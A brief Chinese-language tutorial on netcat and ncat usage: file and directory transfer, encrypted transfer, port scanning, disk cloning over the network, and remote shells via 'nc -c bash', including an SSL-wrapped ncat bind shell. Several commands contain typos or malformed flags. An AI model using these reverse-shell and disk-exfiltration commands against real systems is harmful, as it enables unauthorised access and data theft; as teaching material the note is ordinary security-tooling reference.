共计 966 个字符,预计需要花费 3 分钟才能阅读完成。
NC
NC 的一些功能:
侦听模式 / 传输模式
telnet / 获取 banner 信息
传输文本信息
传输文件 / 目录
加密传输文文件
远程控制 / 木马
加密所有流量
流媒体服务器
远程克隆硬盘
- 传输文件
A:
nc -lp 333 > 1.mp4
B:nc -nv 1.1.1.1 333 < 1.mp4 -q 1
或
A:nc - q 1 -lp 333 < a.mp4
B:nc -nv 1.1.1.1 333 > 2.mp4
- 传输目录
A:
tar -cvf - music/ | nc -lp 333 —q 1
B:nc-nv 1.1.1.1 333 | tar -xvf-
- 加密传输文件
命令用到的参数有,–flush 立即冲洗输出,-F 输出数据,-b 不保留算法信息,-q 关闭一些非严重的警告,-d 解密A:
nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B :mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333-q 1
- 扫描端口
nc -nvz 1.1.1.1 1-65535
所有端口全扫一遍,默认探测 TCP 端口
nc -nvzu 1.1.1.1 1-65535
所有端口全扫一遍,默认探测 UDP 端口,1-65535 表示扫面端口的范围 - 远程克隆硬盘
A:
nc -lp 333 | dd of=/dev/sda
B:dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
- 远程控制
方法一:在服务器端:nc -lp 333(打开的端口)
在客户端:nc -nv(服务器 IP)333 -c bash
将客户端的 bash 传给了服务器
方法二:在服务器端:nc -lp 333(打开的端口)-c bash
在客户端:nc -nv(服务器 IP)333
将服务器端的 bash 传给了客户端
NCat
功能:用来弥补 NC 缺乏加密、身份验证的能力
服务器端侦听 333 端口:
Ncat -c bash –allow 192.168.1.119(IP) -nvl 333 –ssl
(身份验证)允许此 IP 来连接我 使用 ssl 来加密
客户端:
Ncat -nv 192.168.1.115 333 --ssl